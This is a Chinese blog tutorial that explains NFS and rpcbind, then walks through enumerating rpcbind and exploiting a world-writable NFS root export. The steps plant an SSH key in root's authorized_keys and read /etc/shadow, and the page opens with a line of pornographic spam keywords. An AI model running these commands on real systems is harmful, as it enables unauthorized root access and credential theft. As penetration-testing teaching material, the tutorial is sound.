国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

4.8、漏洞利用-NSF配置漏洞與Rpcbind信息泄露

這篇具有很好參考價(jià)值的文章主要介紹了4.8、漏洞利用-NSF配置漏洞與Rpcbind信息泄露。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

1、相關(guān)服務(wù)介紹

1.1 NFS

1.2 RPC服務(wù)

2、探測(cè)目標(biāo)rpcbind

2.1 探測(cè)版本信息

2.2 nmap腳本探測(cè)

2.3 使用metasploit模塊驗(yàn)證


1、相關(guān)服務(wù)介紹

1.1 NFS

NFS(network file system):網(wǎng)絡(luò)文件系統(tǒng)。Linux下三大文件系統(tǒng)之一,采用C/S架構(gòu)。允許網(wǎng)絡(luò)中的計(jì)算機(jī)之間通過(guò)TCP/IP網(wǎng)絡(luò)共享資源。在NFS應(yīng)用中,本地NFS客戶端可以透明的讀寫(xiě)位于遠(yuǎn)端NFS服務(wù)器上的文件。

NFS服務(wù)端機(jī)器:通過(guò)NFS協(xié)議將文件共享到網(wǎng)絡(luò)上

NFS客戶端機(jī)器:通過(guò)網(wǎng)絡(luò)掛載NFS共享目錄到本地

補(bǔ)充:NFS服務(wù)器主要進(jìn)程

1 rpc.nfsd 進(jìn)程
NFS 服務(wù)的主進(jìn)程,主要管理客戶端是否能夠接入 NFS 服務(wù)器以及數(shù)據(jù)的傳輸。

該進(jìn)程固定監(jiān)聽(tīng) TCP/UDP 2049 端口。

2 rpc.mountd 進(jìn)程
管理和維護(hù) NFS 文件系統(tǒng),根據(jù)所設(shè)定的權(quán)限決定是否允許客戶端掛載指定的共享目錄。

該進(jìn)程監(jiān)聽(tīng)的端口默認(rèn)是不固定的。

3 rpc.lockd 進(jìn)程
提供文件鎖功能,防止多個(gè)客戶端同時(shí)寫(xiě)入一個(gè)文件。

該進(jìn)程監(jiān)聽(tīng)的端口默認(rèn)是不固定的。

4 rpc.statd 進(jìn)程
負(fù)責(zé)檢查數(shù)據(jù)的狀態(tài)及一致性,需要與 rpc.lockd 配合使用。

該進(jìn)程監(jiān)聽(tīng)的端口默認(rèn)是不固定的。

5 rpcbind 進(jìn)程
RPC 的端口映射器進(jìn)程,監(jiān)聽(tīng) UDP 111 端口。

更多參考:

NFS詳解(概念+實(shí)驗(yàn)演示)_Eichi_的博客-CSDN博客_nfs

1.2 RPC服務(wù)

RPC(Remote Procedure Call):遠(yuǎn)程過(guò)程調(diào)用協(xié)議。

NFS 只提供了基本的文件處理功能,而不提供任何 TCP/IP 數(shù)據(jù)傳輸功能。它需要借助 RPC 協(xié)議才能實(shí)現(xiàn) TCP/IP 數(shù)據(jù)傳輸功能。

RPC 最主要的功能就是在指定每個(gè) NFS 功能所對(duì)應(yīng)的端口序號(hào)(port number ),并且回報(bào)給客戶端,讓客戶端可以連結(jié)到正確的物理端口(port)上去。

本文實(shí)驗(yàn)即通過(guò)此探測(cè)此服務(wù),獲取NFS相關(guān)服務(wù)信息。

?補(bǔ)充:shodan搜索發(fā)現(xiàn),全球開(kāi)啟111端口的服務(wù)器約210萬(wàn)

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

2、探測(cè)目標(biāo)rpcbind

2.1 探測(cè)版本信息

nmap -sV -p 111 192.168.x.xx

//探測(cè)rpcbind版本信息

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

searchsploit rpcbind

//搜索相關(guān)漏洞

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

2.2 nmap腳本探測(cè)

nmap -p 111 --script=rpcinfo 192.168.x.xx
//探測(cè)目標(biāo)的rpcinfo信息

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

2.3 使用metasploit模塊驗(yàn)證

use auxiliary/scanner/misc/sunrpc_portmapper

//SunRPC Portmap程序枚舉器
//此模塊調(diào)用目標(biāo)端口映射服務(wù)并枚舉所有程序條目及其運(yùn)行端口號(hào)。

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

show info

//查看模塊信息

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

?3、Linux NFS共享目錄配置漏洞

原理: NFS服務(wù)配置漏洞賦予了根目錄遠(yuǎn)程可寫(xiě)權(quán)限,導(dǎo)致/root/.ssh/authorized_keys 可被修改,實(shí)現(xiàn)遠(yuǎn)程ssh無(wú)密碼登錄,或可導(dǎo)致NFS服務(wù)器文件被導(dǎo)出。

nmap --script=nfs-* IP
//星號(hào)加載所有有關(guān)于nfs探測(cè)的腳本,來(lái)探測(cè)對(duì)應(yīng)目標(biāo)的IP地址

除了可以使用nmap判斷nfs是否可以導(dǎo)出,我們還可以使用showmount命令確定“/”共享(文件系統(tǒng)的根)是否可以導(dǎo)出到本地。可能需要安裝nfs-common包才能使用"showmount"命令

apt-get install nfs-common
//安裝nfs-common包
showmount -e IP
//showmount(show mounted disk),其功能是用于顯示NFS服務(wù)器的共享信息。
//-d 僅顯示已被NFS客戶端加載的目錄
//-e 顯示NFS服務(wù)器上所有的共享目錄

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

/*表示根目錄下的內(nèi)容,都可以導(dǎo)出?

(1)遠(yuǎn)程SSH無(wú)密登錄

ssh-keygen 
//生成RSA公鑰

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

cd /tmp
mkdir troot(名字隨意)

mount –t nfs IP:/ /tmp/troot
//把192.168.92.9的根目錄掛載到/tmp/troot/下

cat /root/.ssh/id_rsa.pub>>/tmp/troot/root/.ssh/authorized_keys
//把生成的公鑰追加到靶機(jī)的authorized_keys

rpcbind漏洞,網(wǎng)絡(luò)安全訓(xùn)練營(yíng),安全

ssh root@IP

//實(shí)現(xiàn)無(wú)密碼登錄

(2)導(dǎo)出NFS服務(wù)器文件文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-787354.html

cd ~
mkdir nfs_root
//確定要導(dǎo)出新建的內(nèi)容

mount -t nfs IP地址:/ ~/nfs_root -o nolock
//-o nolock表示不加任何處理,直接輸出

cat ~/nfs_root/etc/shadow
//查看shadow文件
cat ~/nfs-root/etc/passwd
//查看passwd文件

到了這里,關(guān)于4.8、漏洞利用-NSF配置漏洞與Rpcbind信息泄露的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解決辦法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解決辦法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031) 漏洞解決辦法 ? ? ? ? ? ?

    2024年02月12日
    瀏覽(22)
  • 漏洞攻擊中怎么去做最全面覆蓋的sql注入漏洞攻擊?表信息是如何泄露的?預(yù)編譯就一定安全?最受歡迎的十款SQL注入工具配置及使用

    漏洞攻擊中怎么去做最全面覆蓋的sql注入漏洞攻擊?表信息是如何泄露的?預(yù)編譯就一定安全?最受歡迎的十款SQL注入工具配置及使用

    漏洞攻擊中怎么去做最全面覆蓋的sql注入漏洞攻擊?表信息是如何泄露的?預(yù)編譯就一定安全?最受歡迎的十款SQL注入工具配置及使用。 SQL注入是因?yàn)楹笈_(tái)SQL語(yǔ)句拼接了用戶的輸入,而且Web應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的合法性沒(méi)有判斷和過(guò)濾,前端傳入后端的參數(shù)是攻擊者可控

    2024年01月24日
    瀏覽(25)
  • 三、敏感信息泄露漏洞

    一、漏洞簡(jiǎn)述 二、數(shù)據(jù)類型 三、信息分類 1、系統(tǒng)敏感信息泄露 2、個(gè)人敏感信息泄露 四、修復(fù)建議

    2024年02月16日
    瀏覽(33)
  • 【漏洞復(fù)現(xiàn)】大華智慧園區(qū)綜合管理平臺(tái)信息泄露漏洞

    【漏洞復(fù)現(xiàn)】大華智慧園區(qū)綜合管理平臺(tái)信息泄露漏洞

    ????????大華智慧園區(qū)綜合管理平臺(tái)是一款綜合管理平臺(tái),具備園區(qū)運(yùn)營(yíng)、資源調(diào)配和智能服務(wù)等功能。該平臺(tái)旨在協(xié)助優(yōu)化園區(qū)資源分配,滿足多元化的管理需求,同時(shí)通過(guò)提供智能服務(wù),增強(qiáng)使用體驗(yàn)。 ????????大華智慧園區(qū)綜合管理平臺(tái)存在信息泄露漏洞,攻擊

    2024年02月22日
    瀏覽(27)
  • CVE-2023-28432 MinIO 信息泄露漏洞--漏洞復(fù)現(xiàn)10

    微信公眾號(hào)搜索:南風(fēng)漏洞復(fù)現(xiàn)文庫(kù) 南風(fēng)網(wǎng)絡(luò)安全公眾號(hào)首發(fā) MinIO是美國(guó)MinIO公司的一款開(kāi)源的對(duì)象存儲(chǔ)服務(wù)器, 是一款高性能、分布式的對(duì)象存儲(chǔ)系統(tǒng). 它是一款軟件產(chǎn)品, 可以100%的運(yùn)行在標(biāo)準(zhǔn)硬件。即X86等低成本機(jī)器也能夠很好的運(yùn)行MinIO。MinIO中存在一處信息泄露漏洞,

    2024年02月01日
    瀏覽(32)
  • 【漏洞復(fù)現(xiàn)】大華DSS視頻管理系統(tǒng)信息泄露漏洞

    【漏洞復(fù)現(xiàn)】大華DSS視頻管理系統(tǒng)信息泄露漏洞

    ????????大華DSS數(shù)字監(jiān)控系統(tǒng)是一個(gè)在通用安防視頻監(jiān)控系統(tǒng)基礎(chǔ)上設(shè)計(jì)開(kāi)發(fā)的系統(tǒng),除了具有普通安防視頻監(jiān)控系統(tǒng)的實(shí)時(shí)監(jiān)視、云臺(tái)操作、錄像回放、報(bào)警處理、設(shè)備治理等功能外,更注重用戶使用的便利性。 ????????大華DSS視頻管理系統(tǒng)存在信息泄露漏洞,攻擊

    2024年02月21日
    瀏覽(16)
  • Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞

    Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞

    ThinkPHP 是一個(gè)免費(fèi)開(kāi)源的,快速、簡(jiǎn)單的面向?qū)ο蟮妮p量級(jí)PHP開(kāi)發(fā)框架。ThinkPHP Debug 模式存在日志信息泄露漏洞,在開(kāi)啟Debug的情況下會(huì)在Runtime目錄下生成日志,攻擊者通過(guò)構(gòu)造特殊URL地址,讀取日志敏感信息。 ThinkPHP Debug 模式存在日志信息泄露漏洞,在開(kāi)啟Debug的情況下會(huì)

    2024年02月04日
    瀏覽(27)
  • Web漏洞-敏感信息泄露-后臺(tái)地址爆破

    Web漏洞-敏感信息泄露-后臺(tái)地址爆破

    通過(guò)爬蟲(chóng)去爬取網(wǎng)站目錄,然后將爬取到目錄進(jìn)行展現(xiàn),同時(shí)也可以匹配關(guān)鍵目錄,如:admin,manger等。 實(shí)驗(yàn)環(huán)境:kali 實(shí)驗(yàn)工具:Dirb 默認(rèn)情況下后臺(tái)地址是不應(yīng)被搜索引擎爬取到,因?yàn)楹笈_(tái)涉及到關(guān)鍵信息的展示和配置,如果后臺(tái)地址簡(jiǎn)單或者后臺(tái)存在未授權(quán)問(wèn)題,則會(huì)給

    2024年02月12日
    瀏覽(25)
  • 漏洞修復(fù)---SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    1.查看當(dāng)前openssl版本 ? ? ? 我線上版本是?? OpenSSL 1.0.2k-fips?26?Jan?2017 ?官網(wǎng)下載最新版本 【當(dāng)前我下載的版本為 openssl-1.1.1q】 2.將壓縮包上傳到linux服務(wù)器 ? ? tar -zxvf?openssl-1.1.1q.tar.gz 3.編譯安裝 4.?移除老版本openssl 5. 查看版本 openssl version 報(bào)錯(cuò)? ? openssl: error while loadi

    2024年02月16日
    瀏覽(24)
  • 解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    錯(cuò)誤詳情: 解決方案 ?win2012R2解決辦法 參考鏈接:Browse code samples | Microsoft Learn 下載該ps1的文件。 下載該ps1的文件。 首先運(yùn)行PowerShell后去文件夾中運(yùn)行,或者直接輸入 D:Solve-Sweet32.ps1 即可 參考鏈接? SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)解決辦法(WindowsServer2012r2 3389端口 )

    2024年02月12日
    瀏覽(23)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包